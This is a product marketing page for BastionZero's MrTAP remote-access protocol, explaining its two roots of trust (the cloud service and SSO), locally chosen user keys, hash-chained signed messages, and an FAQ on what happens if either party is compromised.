Introducing the Multi Root Trustless Access Protocol (MrTAP)

BastionZero is built on a zero-trust cryptographic messaging protocol for remote access. It eliminates single points of compromise and is so secure, scalable, and invisible that you and your users won't even notice it's there.

Got 6 minutes?

Learn how our security model works from our CEO

The BastionZero token

The BastionZero token has signatures from two independent roots of trust: the BastionZero cloud service, and your Single Sign On Provider (SSO). Targets validate each access against both roots of trust, ensuring that neither BastionZero’s cloud service, nor your SSO, become a single point of compromise for your infrastructure.

The user's key

Each time a user Alice logs into BastionZero, she chooses a fresh key that she stores locally on her machine. Her key is then certified (in the BastionZero token) by the two roots of trust: the BastionZero cloud service and the SSO. Alice then uses her key to sign all her messages. This ensures that our cloud service cannot tamper with Alice’s messages or inject its own commands to your targets.

The message exchange

Our cloud service is not granted privileged access to your targets. Every message in the MrTAP protocol includes the hash of the previous message and the signature of the dispatching party. This prevents the cloud service from altering messages or injecting its own commands.

Frequently asked questions

What if BastionZero is compromised?

If BastionZero’s cloud service is compromised, then the adversary’s options are limited. The adversary can drop messages as they traverse the cloud service, but they cannot execute commands or set up tunnels to the target. This follows because the attacker does not have a valid user account on the Identity Provider (SSO) associated with the target. The targets validate each access against the SSO; so if the SSO has not validated the access, the target will not accept the connection!

What if the user’s SSO is compromised?

Targets are still secure as long as the user’s independent MFA to the BastionZero cloud service is not compromised.

What if BastionZero and the user’s SSO are both compromised?

An adversary can compromise the system only if the BastionZero cloud service was compromised along with a valid user SSO. This scenario is improbable because it means the attacker has compromised multiple independent systems: BastionZero’s cloud service AND the SSO. The increase in attack complexity is the desirable consequence of our MrTAP protocol, which uses multiple roots of trust to eliminate single points of compromise.

Who designed and built your protocol?

We did. Our team includes multiple PhD cryptographers who have collectively authored over 30 peer-reviewed papers in security and cryptography. You can learn more about our protocol by reading our whitepaper or visiting our open-source repositories!

See it for yourself.

Sign up for a demo.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.